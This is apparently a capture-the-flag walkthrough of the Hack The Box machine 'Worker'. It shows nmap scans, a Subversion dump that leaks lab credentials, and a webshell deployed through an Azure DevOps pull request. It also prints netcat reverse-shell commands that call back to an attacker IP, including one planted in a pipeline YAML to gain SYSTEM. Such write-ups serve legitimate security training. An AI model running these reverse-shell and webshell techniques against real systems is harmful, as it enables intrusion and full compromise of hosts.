Worker

Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.203 -oN allPorts
-sS
use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000
nmap will try to keep the sending rate at or above 5000 packets per second.-p-
scanning the entire port range, from 1 to 65535.-T5
insane mode, it is the fastest mode of the nmap time template.-Pn
assume the host is online.-n
scan without reverse DNS resolution.-oN
save the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Sun Jul 3 15:38:10 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.203
Nmap scan report for 10.10.10.203
Host is up (0.067s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
3690/tcp open svn
5985/tcp open wsman
# Nmap done at Sun Jul 3 15:38:36 2022 -- 1 IP address (1 host up) scanned in 26.52 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p80,3690,5985 10.10.10.203 -oN targeted
-sC
performs the scan using the default set of scripts.-sV
enables version detection.-oN
save the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Sun Jul 3 15:38:59 2022 as: nmap -sCV -p80,3690,5985 -oN targeted 10.10.10.203
Nmap scan report for worker.htb (10.10.10.203)
Host is up (0.083s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
3690/tcp open svnserve Subversion
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 3 15:39:08 2022 -- 1 IP address (1 host up) scanned in 9.48 seconds
Ports 80 (HTTP), which may have a website, port 3690 (Subversion) and port 5985 (WinRM) are open. If we take a look at the website, we'll see the default IIS page.

As we saw in the nmap report, port 3690 is open. We could try to enumerate the Subversion server. To enumerate the server, run the following command.
svn ls snv://10.10.10.203
dimension.worker.htb/
moved.txt
There is some content in it. Let's download the content of the Subversion server.
svn checkout svn://10.10.10.203
A dimension.worker.htb
A dimension.worker.htb/LICENSE.txt
A dimension.worker.htb/README.txt
A dimension.worker.htb/assets
A dimension.worker.htb/assets/css
A dimension.worker.htb/assets/css/fontawesome-all.min.css
A dimension.worker.htb/assets/css/main.css
A dimension.worker.htb/assets/css/noscript.css
A dimension.worker.htb/assets/js
A dimension.worker.htb/assets/js/breakpoints.min.js
A dimension.worker.htb/assets/js/browser.min.js
A dimension.worker.htb/assets/js/jquery.min.js
A dimension.worker.htb/assets/js/main.js
A dimension.worker.htb/assets/js/util.js
A dimension.worker.htb/assets/sass
A dimension.worker.htb/assets/sass/base
A dimension.worker.htb/assets/sass/base/_page.scss
A dimension.worker.htb/assets/sass/base/_reset.scss
A dimension.worker.htb/assets/sass/base/_typography.scss
A dimension.worker.htb/assets/sass/components
A dimension.worker.htb/assets/sass/components/_actions.scss
A dimension.worker.htb/assets/sass/components/_box.scss
A dimension.worker.htb/assets/sass/components/_button.scss
A dimension.worker.htb/assets/sass/components/_form.scss
A dimension.worker.htb/assets/sass/components/_icon.scss
A dimension.worker.htb/assets/sass/components/_icons.scss
A dimension.worker.htb/assets/sass/components/_image.scss
A dimension.worker.htb/assets/sass/components/_list.scss
A dimension.worker.htb/assets/sass/components/_table.scss
A dimension.worker.htb/assets/sass/layout
A dimension.worker.htb/assets/sass/layout/_bg.scss
A dimension.worker.htb/assets/sass/layout/_footer.scss
A dimension.worker.htb/assets/sass/layout/_header.scss
A dimension.worker.htb/assets/sass/layout/_main.scss
A dimension.worker.htb/assets/sass/layout/_wrapper.scss
A dimension.worker.htb/assets/sass/libs
A dimension.worker.htb/assets/sass/libs/_breakpoints.scss
A dimension.worker.htb/assets/sass/libs/_functions.scss
A dimension.worker.htb/assets/sass/libs/_mixins.scss
A dimension.worker.htb/assets/sass/libs/_vars.scss
A dimension.worker.htb/assets/sass/libs/_vendor.scss
A dimension.worker.htb/assets/sass/main.scss
A dimension.worker.htb/assets/sass/noscript.scss
A dimension.worker.htb/assets/webfonts
A dimension.worker.htb/assets/webfonts/fa-brands-400.eot
A dimension.worker.htb/assets/webfonts/fa-brands-400.svg
A dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
A dimension.worker.htb/assets/webfonts/fa-brands-400.woff
A dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
A dimension.worker.htb/assets/webfonts/fa-regular-400.eot
A dimension.worker.htb/assets/webfonts/fa-regular-400.svg
A dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
A dimension.worker.htb/assets/webfonts/fa-regular-400.woff
A dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
A dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A dimension.worker.htb/images
A dimension.worker.htb/images/bg.jpg
A dimension.worker.htb/images/overlay.png
A dimension.worker.htb/images/pic01.jpg
A dimension.worker.htb/images/pic02.jpg
A dimension.worker.htb/images/pic03.jpg
A dimension.worker.htb/index.html
A moved.txt
Checked out revision 5.
If we look in our current directory, we'll see the dimension.worker.htb
directory, and the moved.txt
file. Let's take a look at that file.
cat moved.txt
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb
// The Worker team :)
Now that we know a few domain names, let's add them to the /etc/hosts
file.
nano /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
f02::2 ip6-allrouters
10.10.10.203 worker.htb dimension.worker.htb devops.worker.htb
We could also see the commits that have been made.
svn log svn://10.10.10.203
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 15:52:00 +0200 (Sat, 20 Jun 2020) | 1 line
Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 15:50:20 +0200 (Sat, 20 Jun 2020) | 1 line
Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 15:46:19 +0200 (Sat, 20 Jun 2020) | 1 line
-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 15:45:16 +0200 (Sat, 20 Jun 2020) | 1 line
Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 15:43:43 +0200 (Sat, 20 Jun 2020) | 1 line
First version
------------------------------------------------------------------------
As we can see, all the commits have been made by the nathen
user. Let's see the content of the r2
commit.
svn up -r 2
Updating '.':
D moved.txt
A deploy.ps1
Updated to revision 2.
Now we have the deploy.ps1
file. Let's take a look at it.
cat deploy.ps1
$user = "nathen"
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
Now we have some credentials. Let's take a look at the dimension.worker.htb
site, and see if there is any virtual hosting.

Not much going on. Let's take a look now at the devops.worker.htb
site.

Let's try to log in with the found credentials.

And we get it.

Exploitation
Let's click on the SmartHotel360
project.

From the Repos
section we can see all the subdomains of the worker.htb
domain. The idea here is to upload a .aspx
webshell, that you can download from here, to one of the subdomains sites, for example the alpha.worker.htb
. To do it, select the alpha repository, and click on Upload file(s)
.

Then select the cmd.aspx
file and hit on Commit
.

But we get an error because we can not change the master branch. So let's go back, and create a new branch.

Let's call it webshell
.

Then, upload the cmd.aspx
webshell to the webshell
branch.

Then, click on Create a pull request
.

And click on Create
.

Then, click on Approve
.

Now, from the Pipelines
section, let's run the Alpha-CI
pipeline.

And select the webshell
branch.

Finally, the cmd.aspx
file is in the master branch, and we can access it from the browser.
http://alpha.worker.htb/cmd.aspx

Time to get a shell. First, let's set a netcat listener on port 4444.
rlwrap nc -lvnp 4444
-l
listen mode.-v
verbose mode.-n
numeric-only IP, no DNS resolution.-p
specify the port to listen on.
Now, let's set an SMB server on the directory where the nc.exe
binary is located.
impacket-smbserver smbFolder $(pwd) -smb2support
Finally, if we execute the cmd.exe
program with the following parameters on the webshell, we'll get a reverse shell as the iis apppool\defaultapppool
user.
c:\windows\system32\cmd.exe
/c \10.10.14.15\smbFolder\nc.exe -e cmd 10.10.14.15 4444
listening on [any] 4444 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.203] 49865
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
whoami
whoami
iis apppool\defaultapppool
Privilege Escalation
Enumerating the system, we could guess that the user flag is inside the robisl
home directory.
dir \users
Volume in drive C has no label.
Volume Serial Number is 32D6-9041
Directory of c:\users
2020-07-07 17:53 <DIR> .
2020-07-07 17:53 <DIR> ..
2020-03-28 15:59 <DIR> .NET v4.5
2020-03-28 15:59 <DIR> .NET v4.5 Classic
2020-08-18 00:33 <DIR> Administrator
2020-03-28 15:01 <DIR> Public
2020-07-22 01:11 <DIR> restorer
2020-07-08 19:22 <DIR> robisl
0 File(s) 0 bytes
8 Dir(s) 10�490�904�576 bytes free
At this point, something that we could do is enumerate the logical disks available on the system.
wmic logicaldisk get name
Name
C:
W:
There is the W:
logical disk. Let's enumerate it.
dir W:
Volume in drive W is Work
Volume Serial Number is E82A-AEA8
Directory of W:\
2020-06-16 18:59 <DIR> agents
2020-03-28 15:57 <DIR> AzureDevOpsData
2020-04-03 11:31 <DIR> sites
2020-06-20 16:04 <DIR> svnrepos
0 File(s) 0 bytes
4 Dir(s) 18�768�314�368 bytes free
Inside the svnrepos
directory, we could find the \svnrepos\www\conf\passwd
file, which contains a lot of credentials, including the nathen
and robisl
users.
type W:\svnrepos\www\conf\passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.
[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
We could try the credentials for the robisl
user on the devops.worker.htb
website.

Now we see the PartsUnlimited
project.

This project only has one repository.

From the Project setings > Security
we can see that the robisl
user is a member of the Build Administrators
group, so we can create pipelines.

Let's go the Pipelines
section, and create a new pipeline.

Then, select the Azure Repos Git
option.

Then, select the PartsUnlimited
project.

Now, select the Starter pipeline
.

Then, we will configure the YAML file by changing the pool value to Setup
. As the agent pool is called that way.

And then we'll change the script value to a command which will send us a reverse shell.

# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml
trigger:
- master
pool: 'Setup'
steps:
- script: echo Hello, world!
displayName: 'Run a one-line script'
- script: \\10.10.14.15\smbFolder\nc.exe -e cmd 10.10.14.15 4444
displayName: 'Run a multi-line script'
Make sure to still have the SMB server set on the directory where the nc.exe
binary is. Then let's set another netcat listener on port 4444.
rlwrap nc -lvnp 4444
-l
listen mode.-v
verbose mode.-n
numeric-only IP, no DNS resolution.-p
specify the port to listen on.
Then, click on Save and run
, and select the Create a new branch for this commit and start a pull request
option. Then click on Save and run
.

Then, we'll have to wait for a bit, and we'll get a shell as the nt authority\system
user. Then all we have to do is reap the harvest and take the root flag.
listening on [any] 4444 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.203] 50077
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
whoami
nt authority\system
type C:\users\administrator\desktop\root.txt
da8deb09764e1567ed487b8ba21c6703
Last updated
Was this helpful?